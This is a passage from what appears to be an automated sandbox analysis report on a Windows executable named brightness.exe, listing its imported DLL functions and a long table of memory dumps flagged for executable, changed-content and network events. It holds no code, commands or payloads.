GetFileVersionInfoSizeA	-	0x00475B9C	0x0007559C	0x0006F99C	0x00000000
GetFileVersionInfoA	-	0x00475BA0	0x000755A0	0x0006F9A0	0x00000000

kernel32.dll (58)

API Name	Ordinal	IAT Address	Thunk RVA	Thunk Offset	Hint
lstrcpyA	-	0x00475BA8	0x000755A8	0x0006F9A8	0x00000000
lstrcatA	-	0x00475BAC	0x000755AC	0x0006F9AC	0x00000000
_lread	-	0x00475BB0	0x000755B0	0x0006F9B0	0x00000000
_lopen	-	0x00475BB4	0x000755B4	0x0006F9B4	0x00000000
_llseek	-	0x00475BB8	0x000755B8	0x0006F9B8	0x00000000
_lclose	-	0x00475BBC	0x000755BC	0x0006F9BC	0x00000000
WriteFile	-	0x00475BC0	0x000755C0	0x0006F9C0	0x00000000
WaitForSingleObject	-	0x00475BC4	0x000755C4	0x0006F9C4	0x00000000
VirtualQuery	-	0x00475BC8	0x000755C8	0x0006F9C8	0x00000000
VirtualAlloc	-	0x00475BCC	0x000755CC	0x0006F9CC	0x00000000
SizeofResource	-	0x00475BD0	0x000755D0	0x0006F9D0	0x00000000
SetThreadLocale	-	0x00475BD4	0x000755D4	0x0006F9D4	0x00000000
SetFilePointer	-	0x00475BD8	0x000755D8	0x0006F9D8	0x00000000
SetEvent	-	0x00475BDC	0x000755DC	0x0006F9DC	0x00000000
SetErrorMode	-	0x00475BE0	0x000755E0	0x0006F9E0	0x00000000
SetEndOfFile	-	0x00475BE4	0x000755E4	0x0006F9E4	0x00000000
ResetEvent	-	0x00475BE8	0x000755E8	0x0006F9E8	0x00000000
ReadFile	-	0x00475BEC	0x000755EC	0x0006F9EC	0x00000000
MultiByteToWideChar	-	0x00475BF0	0x000755F0	0x0006F9F0	0x00000000
MulDiv	-	0x00475BF4	0x000755F4	0x0006F9F4	0x00000000
LockResource	-	0x00475BF8	0x000755F8	0x0006F9F8	0x00000000
LoadResource	-	0x00475BFC	0x000755FC	0x0006F9FC	0x00000000
LoadLibraryA	-	0x00475C00	0x00075600	0x0006FA00	0x00000000
LeaveCriticalSection	-	0x00475C04	0x00075604	0x0006FA04	0x00000000
InitializeCriticalSection	-	0x00475C08	0x00075608	0x0006FA08	0x00000000
GlobalFindAtomA	-	0x00475C0C	0x0007560C	0x0006FA0C	0x00000000
GlobalDeleteAtom	-	0x00475C10	0x00075610	0x0006FA10	0x00000000
GlobalAddAtomA	-	0x00475C14	0x00075614	0x0006FA14	0x00000000
GetVersionExA	-	0x00475C18	0x00075618	0x0006FA18	0x00000000
GetVersion	-	0x00475C1C	0x0007561C	0x0006FA1C	0x00000000
GetTickCount	-	0x00475C20	0x00075620	0x0006FA20	0x00000000
GetThreadLocale	-	0x00475C24	0x00075624	0x0006FA24	0x00000000
GetStdHandle	-	0x00475C28	0x00075628	0x0006FA28	0x00000000
GetProcAddress	-	0x00475C2C	0x0007562C	0x0006FA2C	0x00000000
GetModuleHandleA	-	0x00475C30	0x00075630	0x0006FA30	0x00000000
GetModuleFileNameA	-	0x00475C34	0x00075634	0x0006FA34	0x00000000
GetLocaleInfoA	-	0x00475C38	0x00075638	0x0006FA38	0x00000000
GetLocalTime	-	0x00475C3C	0x0007563C	0x0006FA3C	0x00000000
GetLastError	-	0x00475C40	0x00075640	0x0006FA40	0x00000000
GetFullPathNameA	-	0x00475C44	0x00075644	0x0006FA44	0x00000000
GetDiskFreeSpaceA	-	0x00475C48	0x00075648	0x0006FA48	0x00000000
GetDateFormatA	-	0x00475C4C	0x0007564C	0x0006FA4C	0x00000000
GetCurrentThreadId	-	0x00475C50	0x00075650	0x0006FA50	0x00000000
GetCurrentProcessId	-	0x00475C54	0x00075654	0x0006FA54	0x00000000
GetCPInfo	-	0x00475C58	0x00075658	0x0006FA58	0x00000000
FreeResource	-	0x00475C5C	0x0007565C	0x0006FA5C	0x00000000
InterlockedExchange	-	0x00475C60	0x00075660	0x0006FA60	0x00000000
FreeLibrary	-	0x00475C64	0x00075664	0x0006FA64	0x00000000
FormatMessageA	-	0x00475C68	0x00075668	0x0006FA68	0x00000000
FindResourceA	-	0x00475C6C	0x0007566C	0x0006FA6C	0x00000000
EnumCalendarInfoA	-	0x00475C70	0x00075670	0x0006FA70	0x00000000
EnterCriticalSection	-	0x00475C74	0x00075674	0x0006FA74	0x00000000
DeleteCriticalSection	-	0x00475C78	0x00075678	0x0006FA78	0x00000000
CreateThread	-	0x00475C7C	0x0007567C	0x0006FA7C	0x00000000
CreateFileA	-	0x00475C80	0x00075680	0x0006FA80	0x00000000
CreateEventA	-	0x00475C84	0x00075684	0x0006FA84	0x00000000
CompareStringA	-	0x00475C88	0x00075688	0x0006FA88	0x00000000
CloseHandle	-	0x00475C8C	0x0007568C	0x0006FA8C	0x00000000

advapi32.dll (4)

API Name	Ordinal	IAT Address	Thunk RVA	Thunk Offset	Hint
RegQueryValueExA	-	0x00475C94	0x00075694	0x0006FA94	0x00000000
RegOpenKeyExA	-	0x00475C98	0x00075698	0x0006FA98	0x00000000
RegFlushKey	-	0x00475C9C	0x0007569C	0x0006FA9C	0x00000000
RegCloseKey	-	0x00475CA0	0x000756A0	0x0006FAA0	0x00000000

oleaut32.dll (4)

API Name	Ordinal	IAT Address	Thunk RVA	Thunk Offset	Hint
CreateErrorInfo	-	0x00475CA8	0x000756A8	0x0006FAA8	0x00000000
GetErrorInfo	-	0x00475CAC	0x000756AC	0x0006FAAC	0x00000000
SetErrorInfo	-	0x00475CB0	0x000756B0	0x0006FAB0	0x00000000
SysFreeString	-	0x00475CB4	0x000756B4	0x0006FAB4	0x00000000

ole32.dll (3)

API Name	Ordinal	IAT Address	Thunk RVA	Thunk Offset	Hint
CoCreateInstance	-	0x00475CBC	0x000756BC	0x0006FABC	0x00000000
CoUninitialize	-	0x00475CC0	0x000756C0	0x0006FAC0	0x00000000
CoInitialize	-	0x00475CC4	0x000756C4	0x0006FAC4	0x00000000

kernel32.dll (1)

API Name	Ordinal	IAT Address	Thunk RVA	Thunk Offset	Hint
Sleep	-	0x00475CCC	0x000756CC	0x0006FACC	0x00000000

oleaut32.dll (8)

API Name	Ordinal	IAT Address	Thunk RVA	Thunk Offset	Hint
SafeArrayPtrOfIndex	-	0x00475CD4	0x000756D4	0x0006FAD4	0x00000000
SafeArrayGetUBound	-	0x00475CD8	0x000756D8	0x0006FAD8	0x00000000
SafeArrayGetLBound	-	0x00475CDC	0x000756DC	0x0006FADC	0x00000000
SafeArrayCreate	-	0x00475CE0	0x000756E0	0x0006FAE0	0x00000000
VariantChangeType	-	0x00475CE4	0x000756E4	0x0006FAE4	0x00000000
VariantCopy	-	0x00475CE8	0x000756E8	0x0006FAE8	0x00000000
VariantClear	-	0x00475CEC	0x000756EC	0x0006FAEC	0x00000000
VariantInit	-	0x00475CF0	0x000756F0	0x0006FAF0	0x00000000

comctl32.dll (20)

API Name	Ordinal	IAT Address	Thunk RVA	Thunk Offset	Hint
_TrackMouseEvent	-	0x00475CF8	0x000756F8	0x0006FAF8	0x00000000
ImageList_SetIconSize	-	0x00475CFC	0x000756FC	0x0006FAFC	0x00000000
ImageList_GetIconSize	-	0x00475D00	0x00075700	0x0006FB00	0x00000000
ImageList_Write	-	0x00475D04	0x00075704	0x0006FB04	0x00000000
ImageList_Read	-	0x00475D08	0x00075708	0x0006FB08	0x00000000
ImageList_DragShowNolock	-	0x00475D0C	0x0007570C	0x0006FB0C	0x00000000
ImageList_DragMove	-	0x00475D10	0x00075710	0x0006FB10	0x00000000
ImageList_DragLeave	-	0x00475D14	0x00075714	0x0006FB14	0x00000000
ImageList_DragEnter	-	0x00475D18	0x00075718	0x0006FB18	0x00000000
ImageList_EndDrag	-	0x00475D1C	0x0007571C	0x0006FB1C	0x00000000
ImageList_BeginDrag	-	0x00475D20	0x00075720	0x0006FB20	0x00000000
ImageList_Remove	-	0x00475D24	0x00075724	0x0006FB24	0x00000000
ImageList_DrawEx	-	0x00475D28	0x00075728	0x0006FB28	0x00000000
ImageList_Draw	-	0x00475D2C	0x0007572C	0x0006FB2C	0x00000000
ImageList_GetBkColor	-	0x00475D30	0x00075730	0x0006FB30	0x00000000
ImageList_SetBkColor	-	0x00475D34	0x00075734	0x0006FB34	0x00000000
ImageList_Add	-	0x00475D38	0x00075738	0x0006FB38	0x00000000
ImageList_GetImageCount	-	0x00475D3C	0x0007573C	0x0006FB3C	0x00000000
ImageList_Destroy	-	0x00475D40	0x00075740	0x0006FB40	0x00000000
ImageList_Create	-	0x00475D44	0x00075744	0x0006FB44	0x00000000

comdlg32.dll (1)

API Name	Ordinal	IAT Address	Thunk RVA	Thunk Offset	Hint
GetOpenFileNameA	-	0x00475D4C	0x0007574C	0x0006FB4C	0x00000000

Memory Dumps (394)

Name	Process ID	Start VA	End VA	Dump Reason	Bitness	Entry Point	Actions
brightness.exe	2	0x00400000	0x00523FFF	Relevant Image	32-bit	0x004044E4	... Actions Go to Process Download Dump
buffer	2	0x00630000	0x00630FFF	First Execution	32-bit	0x00630FE2	... Actions Go to Process Download Dump
buffer	2	0x206BE6C8	0x206BEAAE	Marked Executable	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Marked Executable	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x206B8000	0x206BFFFF	First Network Behavior	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x0019C000	0x0019FFFF	First Network Behavior	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x00630000	0x00630FFF	First Network Behavior	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x021B0000	0x022EFFFF	First Network Behavior	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	First Network Behavior	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x20480000	0x205BFFFF	First Network Behavior	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x206BE6C8	0x206BEAAE	First Network Behavior	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x7F560000	0x7F67FFFF	First Network Behavior	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x7F680000	0x7FAEFFFF	First Network Behavior	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x7FAF0000	0x7FC0FFFF	First Network Behavior	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x7FC10000	0x7FC8FFFF	First Network Behavior	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x7FC90000	0x7FCFFFFF	First Network Behavior	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x7FD00000	0x7FD8FFFF	First Network Behavior	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x7FD90000	0x7FE1FFFF	First Network Behavior	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x7FE20000	0x7FEAFFFF	First Network Behavior	32-bit	-	... Actions Go to Process Download Dump
brightness.exe	2	0x00400000	0x00523FFF	First Network Behavior	32-bit	-	... Actions Go to Process Download Dump
counters.dat	2	0x00B60000	0x00B60FFF	First Network Behavior	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x206BE6C8	0x206BEAAE	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x206BE6C8	0x206BEAAE	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x206BE6C8	0x206BEAAE	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x206BE6C8	0x206BEAAE	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x206BE6C8	0x206BEAAE	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x206BE6C8	0x206BEAAE	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x206BE6C8	0x206BEAAE	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x206BE6C8	0x206BEAAE	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x206BE6C8	0x206BEAAE	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x206BE6C8	0x206BEAAE	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
buffer	2	0x02802388	0x0281AA2A	Content Changed	32-bit	-	... Actions Go to Process Download Dump
